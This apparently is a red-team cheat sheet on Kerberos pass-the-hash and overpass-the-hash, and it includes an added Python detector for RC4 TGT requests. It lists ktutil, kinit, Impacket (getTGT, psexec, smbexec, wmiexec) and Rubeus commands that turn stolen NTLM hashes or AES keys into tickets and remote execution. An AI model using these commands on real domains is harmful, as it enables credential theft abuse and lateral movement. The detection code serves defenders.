PTH and Over PTH

Pass the Hash

https://malicious.link/post/2018/pass-the-hash-with-kerberos/

ktutil
addent -p <user>@<fqdn_domain> -k 1 -key -e rc4-hmac
// when prompted for the key, paste the account's NT hash (hex)
wkt /tmp/a.keytab
exit
kinit -V -k -t /tmp/a.keytab -f <user>@<fqdn_domain>
klist

Overpass the Hash

Using the account's AES key is stealthier than using the NTLM hash: an RC4-encrypted TGT request stands out in a domain where AES is the norm.
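Added example (not from the original post) showing the defender's side of that remark: a small Python checker over constructed Windows 4768 (TGT request) log lines, written here in a simplified key=value form rather than the native event layout, that flags RC4-HMAC (0x17) ticket encryption for accounts not on an explicit RC4 allowlist.

```python
# Added example, not from the original page: flag TGT requests (Windows event 4768)
# whose ticket encryption type is RC4-HMAC (0x17). In an AES-enabled domain such a
# request is the usual artefact of an NTLM-hash based overpass-the-hash, which is
# why the AES-key variant is considered stealthier. Log lines are constructed, in a
# simplified key=value form, purely for this demo.
import re
from typing import Dict, List, Iterable

RC4_HMAC = "0x17"             # etype 23 per the Kerberos enctype registry
AES_TYPES = {"0x11", "0x12"}  # AES128 (17) / AES256 (18)

SAMPLE_4768 = """\
EventID=4768 TargetUserName=alice TargetDomainName=CORP.EXAMPLE IpAddress=10.0.0.21 TicketEncryptionType=0x12 PreAuthType=2
EventID=4768 TargetUserName=svc_backup TargetDomainName=CORP.EXAMPLE IpAddress=10.0.0.77 TicketEncryptionType=0x17 PreAuthType=2
EventID=4768 TargetUserName=legacy$ TargetDomainName=CORP.EXAMPLE IpAddress=10.0.0.9 TicketEncryptionType=0x17 PreAuthType=2
EventID=4769 TargetUserName=alice TargetDomainName=CORP.EXAMPLE IpAddress=10.0.0.21 TicketEncryptionType=0x12
"""

KV = re.compile(r"(\w+)=(\S+)")

def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value log line into a dict (constructed format, see above)."""
    return dict(KV.findall(line))

def rc4_tgt_requests(log: str, rc4_allowlist: Iterable[str] = ()) -> List[Dict[str, str]]:
    """Return 4768 events that used RC4, skipping accounts known to still need it.

    Only AS-REQ events (4768) are considered; 4769 service ticket events are
    ignored here because RC4 on a service ticket says more about the target
    service account's supported enctypes than about how the caller obtained
    its TGT.
    """
    allow = {a.lower() for a in rc4_allowlist}
    hits = []
    for line in log.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "4768":
            continue
        if ev.get("TicketEncryptionType") != RC4_HMAC:
            continue
        if ev.get("TargetUserName", "").lower() in allow:
            continue
        hits.append(ev)
    return hits

if __name__ == "__main__":
    for ev in rc4_tgt_requests(SAMPLE_4768, rc4_allowlist=["legacy$"]):
        print(f"RC4 TGT request: {ev['TargetUserName']} from {ev['IpAddress']}")
```

Accounts flagged by this check on a real domain should be cross-referenced with their msDS-SupportedEncryptionTypes and the requesting host before being treated as overpass-the-hash, since legacy systems can legitimately fall back to RC4.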

Impacket

Request TGT

python getTGT.py <domain>/<user> -hashes [lm:]<ntlm>
python getTGT.py <domain>/<user> -aesKey <aes_key>
python getTGT.py <domain>/<user>:<password>

Point Impacket at the ticket (the ccache file written by getTGT.py)

export KRB5CCNAME=<tgt.file>

Remote command execution using the ticket

python psexec.py <domain>/<user>@<host> -k -no-pass
python smbexec.py <domain>/<user>@<host> -k -no-pass
python wmiexec.py <domain>/<user>@<host> -k -no-pass

Rubeus

Request a TGT and inject it into the current logon session (/ptt)

.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt